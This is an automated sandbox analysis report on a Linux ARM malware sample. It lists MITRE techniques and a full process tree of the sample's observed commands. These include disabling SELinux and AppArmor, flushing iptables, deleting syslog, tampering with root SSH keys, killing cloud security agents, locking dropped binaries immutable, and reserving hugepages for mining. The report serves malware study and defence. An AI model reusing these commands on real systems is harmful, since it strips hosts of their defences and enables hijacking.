1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Analysis

max time kernel
23s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
20-10-2024 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
Size

46KB
MD5

150dc9ae7c5729552ec2e92a7bc49095
SHA1

2aed6d97f2c3400e1eb7e136e245a6f45ef4ae1f
SHA256

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
SHA512

13c40ba893a9f7a0f3e674400025f65e041e91f09b6def779078e391e35a3dedaf55742e68ae0b9b6f3c9120c1628266fb16348b674e988d146ed3d7b2c3f9c7
SSDEEP

768:bxlT2wDuWvWi7JFNcuFkc2zq0x3UKnicZuiR/amT8z:8wF+Lc2/FicfSmT8z

Score

7^/10

defense_evasion discovery evasion persistence

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmod

pid	Process
650	chmod
652	chmod

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Clear Linux or Mac System Logs

T1070.002

Processes:

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

Processes:

iptables

pid	Process
662	iptables

Attempts to change immutable files 55 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargschattrgrepxargsxargsxargsxargschattrchattrxargsxargsxargsxargschattrchattrxargsxargsxargsxargschattrchattrchattrxargsxargsxargsxargsgrepxargsxargschattrxargsxargsxargschattrchattrxargsxargschattrchattrchattrxargsxargsxargsxargsxargschattrchattrxargschattrxargschattrxargs

pid	Process
807	xargs
934	xargs
1012	xargs
800	xargs
655	chattr
714	grep
846	xargs
940	xargs
952	xargs
982	xargs
892	chattr
667	chattr
749	xargs
821	xargs
836	xargs
861	xargs
887	chattr
890	chattr
924	xargs
994	xargs
1027	xargs
1037	xargs
893	chattr
896	chattr
897	chattr
970	xargs
1006	xargs
1017	xargs
1042	xargs
712	grep
1032	xargs
1047	xargs
660	chattr
867	xargs
958	xargs
964	xargs
674	chattr
882	chattr
929	xargs
946	xargs
881	chattr
884	chattr
888	chattr
976	xargs
1000	xargs
742	xargs
829	xargs
853	xargs
670	chattr
895	chattr
1022	xargs
672	chattr
814	xargs
899	chattr
988	xargs

Disables AppArmor 16 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	Process
716	systemctl
724	systemctl
724	systemctl
724	systemctl
724	systemctl
716	systemctl
716	systemctl
716	systemctl
731	systemctl
724	systemctl
736	systemctl
716	systemctl
716	systemctl
723	systemctl
724	systemctl
728	systemctl

Disables SELinux 1 TTPs 1 IoCs

Disables SELinux security module.

defense_evasion

Disable or Modify Tools

T1562.001

Processes:

setenforce

pid	Process
715	setenforce

Enumerates running processes
Discovers information about currently running processes on the system

Write file to user bin folder 6 IoCs

persistence

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description	ioc	Process
File opened for modification	/usr/bin/irqbalanced	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/rctlcli	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/systemd-network	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/pamdicks	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/ip6network	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/kswaped	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Reads CPU attributes 1 TTPs 25 IoCs

discovery

System Information Discovery

T1082

Processes:

pspspspspspspspspspspssysctlpspspspspspspspspspspspsps

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	sysctl
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Process Discovery 1 TTPs 24 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

Processes:

pspspspspspspspspspspspspspspspspspspspspspspsps

pid	Process
713	ps
745	ps
817	ps
842	ps
857	ps
1028	ps
738	ps
774	ps
849	ps
711	ps
763	ps
796	ps
832	ps
1023	ps
1033	ps
752	ps
785	ps
803	ps
810	ps
825	ps
863	ps
1018	ps
1038	ps
1043	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pspspspspssystemctlpspspspspspspspspspspspspspspsawkps

description	ioc	Process
File opened for reading	/proc/24/cmdline	ps
File opened for reading	/proc/145/status	ps
File opened for reading	/proc/786/stat	ps
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/216/stat	ps
File opened for reading	/proc/15/cmdline	ps
File opened for reading	/proc/17/cmdline	ps
File opened for reading	/proc/109/stat	ps
File opened for reading	/proc/641/status	ps
File opened for reading	/proc/22/cmdline	ps
File opened for reading	/proc/149/cmdline	ps
File opened for reading	/proc/26/stat	ps
File opened for reading	/proc/26/cmdline	ps
File opened for reading	/proc/691/stat	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/641/stat	ps
File opened for reading	/proc/6/status	ps
File opened for reading	/proc/3/status	ps
File opened for reading	/proc/653/stat	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/799/cmdline	ps
File opened for reading	/proc/649/status	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/691/status	ps
File opened for reading	/proc/269/cmdline	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/24/cmdline	ps
File opened for reading	/proc/149/status	ps
File opened for reading	/proc/24/cmdline	ps
File opened for reading	/proc/28/status	ps
File opened for reading	/proc/604/stat	ps
File opened for reading	/proc/23/cmdline	ps
File opened for reading	/proc/317/cmdline	ps
File opened for reading	/proc/216/stat	ps
File opened for reading	/proc/648/stat	ps
File opened for reading	/proc/20/cmdline	ps
File opened for reading	/proc/23/status	ps
File opened for reading	/proc/269/stat	ps
File opened for reading	/proc/28/stat	ps
File opened for reading	/proc/599/cmdline	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/604/cmdline	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/765/cmdline	ps
File opened for reading	/proc/269/stat	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/599/status	ps
File opened for reading	/proc/17/stat	ps
File opened for reading	/proc/141/stat	ps
File opened for reading	/proc/41/cmdline	ps
File opened for reading	/proc/583/status	ps
File opened for reading	/proc/29/cmdline	ps
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/149/cmdline	ps
File opened for reading	/proc/329/stat	ps
File opened for reading	/proc/216/cmdline	ps
File opened for reading	/proc/216/cmdline	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/106/cmdline	ps
File opened for reading	/proc/641/stat	ps

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

chattrchattr

pid	Process
881	chattr
892	chattr

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description	ioc	Process
File opened for modification	/tmp/dev/null	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
1⤵
- Write file to user bin folder
- Writes file to tmp directory
PID:649
- /bin/chmod
  chmod 777 /usr/bin/chattr
  2⤵
  - File and Directory Permissions Modification
  PID:650
- /bin/chmod
  chmod 777 /bin/chattr
  2⤵
  - File and Directory Permissions Modification
  PID:652
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:655
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:660
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:662
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:667
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:670
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:672
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:674
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:677
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:680
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:682
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:684
- /bin/sync
  sync
  2⤵
  PID:685
- /bin/cat
  cat /var/spool/cron/
  2⤵
  PID:690
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:692
- /bin/mv
  mv /usr/bin/wgettnt /usr/bin/wd1
  2⤵
  PID:694
- /bin/mv
  mv /usr/bin/curltnt /usr/bin/cd1
  2⤵
  PID:697
- /bin/mv
  mv /usr/bin/wget1 /usr/bin/wd1
  2⤵
  PID:698
- /bin/mv
  mv /usr/bin/curl1 /usr/bin/cd1
  2⤵
  PID:699
- /bin/mv
  mv /usr/bin/cur /usr/bin/cd1
  2⤵
  PID:701
- /bin/mv
  mv /usr/bin/cdl /usr/bin/cd1
  2⤵
  PID:702
- /bin/mv
  mv /usr/bin/cdt /usr/bin/cd1
  2⤵
  PID:703
- /bin/mv
  mv /usr/bin/xget /usr/bin/wd1
  2⤵
  PID:705
- /bin/mv
  mv /usr/bin/wge /usr/bin/wd1
  2⤵
  PID:706
- /bin/mv
  mv /usr/bin/wdl /usr/bin/wd1
  2⤵
  PID:707
- /bin/mv
  mv /usr/bin/wdt /usr/bin/wd1
  2⤵
  PID:708
- /bin/mv
  mv /usr/bin/wget /usr/bin/wd1
  2⤵
  PID:709
- /bin/mv
  mv /usr/bin/curl /usr/bin/cd1
  2⤵
  PID:710
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:711
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:712
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:714
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:713
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:715
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:716
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:717
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:718
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:719
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:722
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:721
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:716
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:716
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:716
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:716
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:716
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:716
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:723
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:724
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:725
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:726
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:728
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:731
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:732
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:724
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:724
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:724
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:724
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:724
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:724
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:736
- /bin/grep
  grep aegis
  2⤵
  PID:740
- /bin/grep
  grep -v grep
  2⤵
  PID:739
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:738
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:741
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:742
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:749
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:748
- /bin/grep
  grep Yun
  2⤵
  PID:747
- /bin/grep
  grep -v grep
  2⤵
  PID:746
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:745
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:757
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:761
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:761
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:761
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:761
- - /sbin/rm
    rm -rf
    3⤵
    PID:761
- - /bin/rm
    rm -rf
    3⤵
    PID:761
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:756
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:760
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:760
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:760
- - /usr/bin/dirname
    dirname
    3⤵
    PID:760
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:755
- /bin/grep
  grep aegis
  2⤵
  PID:754
- /bin/grep
  grep -v grep
  2⤵
  PID:753
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:752
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:768
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:773
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:773
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:773
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:773
- - /sbin/rm
    rm -rf
    3⤵
    PID:773
- - /bin/rm
    rm -rf
    3⤵
    PID:773
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:767
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:771
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:771
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:771
- - /usr/bin/dirname
    dirname
    3⤵
    PID:771
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:766
- /bin/grep
  grep hids
  2⤵
  PID:765
- /bin/grep
  grep -v grep
  2⤵
  PID:764
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:763
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:779
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:783
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:783
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:783
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:783
- - /sbin/rm
    rm -rf
    3⤵
    PID:783
- - /bin/rm
    rm -rf
    3⤵
    PID:783
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:778
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:782
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:782
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:782
- - /usr/bin/dirname
    dirname
    3⤵
    PID:782
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:777
- /bin/grep
  grep cloudwalker
  2⤵
  PID:776
- /bin/grep
  grep -v grep
  2⤵
  PID:775
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:774
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:790
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:794
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:794
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:794
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:794
- - /sbin/rm
    rm -rf
    3⤵
    PID:794
- - /bin/rm
    rm -rf
    3⤵
    PID:794
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:789
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:793
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:793
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:793
- - /usr/bin/dirname
    dirname
    3⤵
    PID:793
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:788
- /bin/grep
  grep titanagent
  2⤵
  PID:787
- /bin/grep
  grep -v grep
  2⤵
  PID:786
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:785
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:800
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:799
- /bin/grep
  grep edr
  2⤵
  PID:798
- /bin/grep
  grep -v grep
  2⤵
  PID:797
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:796
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:807
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:806
- /bin/grep
  grep aegis
  2⤵
  PID:805
- /bin/grep
  grep -v grep
  2⤵
  PID:804
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:803
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:814
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:813
- /bin/grep
  grep Yun
  2⤵
  PID:812
- /bin/grep
  grep -v grep
  2⤵
  PID:811
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:810
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:821
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:820
- /bin/grep
  grep hids
  2⤵
  PID:819
- /bin/grep
  grep -v grep
  2⤵
  PID:818
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:817
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:829
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:828
- /bin/grep
  grep edr
  2⤵
  PID:827
- /bin/grep
  grep -v grep
  2⤵
  PID:826
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:825
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:835
- /bin/grep
  grep cloudwalker
  2⤵
  PID:834
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:836
- /bin/grep
  grep -v grep
  2⤵
  PID:833
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:832
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:846
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:845
- /bin/grep
  grep titanagent
  2⤵
  PID:844
- /bin/grep
  grep -v grep
  2⤵
  PID:843
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:842
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:852
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:853
- /bin/grep
  grep sgagent
  2⤵
  PID:851
- /bin/grep
  grep -v grep
  2⤵
  PID:850
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:849
- /bin/grep
  grep barad_agent
  2⤵
  PID:859
- /bin/grep
  grep -v grep
  2⤵
  PID:858
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:860
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:861
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:857
- /bin/grep
  grep hostguard
  2⤵
  PID:865
- /bin/grep
  grep -v grep
  2⤵
  PID:864
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:863
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:866
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  - Attempts to change immutable files
  PID:867
- /bin/rm
  rm -rf /usr/local/aegis
  2⤵
  PID:869
- /bin/sleep
  sleep 1
  2⤵
  PID:870
- /usr/bin/chattr
  chattr -i /usr/bin/ip6network
  2⤵
  - Attempts to change immutable files
  - System Network Configuration Discovery
  PID:881
- /usr/bin/chattr
  chattr -i /usr/bin/kswaped
  2⤵
  - Attempts to change immutable files
  PID:882
- /usr/bin/chattr
  chattr -i /usr/bin/irqbalanced
  2⤵
  - Attempts to change immutable files
  PID:884
- /usr/bin/chattr
  chattr -i /usr/bin/rctlcli
  2⤵
  - Attempts to change immutable files
  PID:887
- /usr/bin/chattr
  chattr -i /usr/bin/systemd-network
  2⤵
  - Attempts to change immutable files
  PID:888
- /usr/bin/chattr
  chattr -i /usr/bin/pamdicks
  2⤵
  - Attempts to change immutable files
  PID:890
- /usr/bin/chattr
  chattr +i /usr/bin/ip6network
  2⤵
  - Attempts to change immutable files
  - System Network Configuration Discovery
  PID:892
- /usr/bin/chattr
  chattr +i /usr/bin/kswaped
  2⤵
  - Attempts to change immutable files
  PID:893
- /usr/bin/chattr
  chattr +i /usr/bin/irqbalanced
  2⤵
  - Attempts to change immutable files
  PID:895
- /usr/bin/chattr
  chattr +i /usr/bin/rctlcli
  2⤵
  - Attempts to change immutable files
  PID:896
- /usr/bin/chattr
  chattr +i /usr/bin/systemd-network
  2⤵
  - Attempts to change immutable files
  PID:897
- /usr/bin/chattr
  chattr +i /usr/bin/pamdicks
  2⤵
  - Attempts to change immutable files
  PID:899
- /bin/sleep
  sleep 1
  2⤵
  PID:901
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:918
- /sbin/sysctl
  sysctl -w "vm.nr_hugepages=128"
  2⤵
  - Reads CPU attributes
  PID:919
- /bin/grep
  grep 194.87.139.103
  2⤵
  PID:921
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:922
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:923
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:924
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:927
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:928
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:929
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:926
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:931
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:933
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:932
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:934
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:938
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:937
- /bin/grep
  grep -v -
  2⤵
  PID:939
- /bin/grep
  grep :23
  2⤵
  PID:936
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:940
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:944
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:943
- /bin/grep
  grep :143
  2⤵
  PID:942
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:946
- /bin/grep
  grep -v -
  2⤵
  PID:945
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:949
- /bin/grep
  grep -v -
  2⤵
  PID:951
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:950
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:952
- /bin/grep
  grep :2222
  2⤵
  PID:948
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:956
- /bin/grep
  grep -v -
  2⤵
  PID:957
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:955
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:958
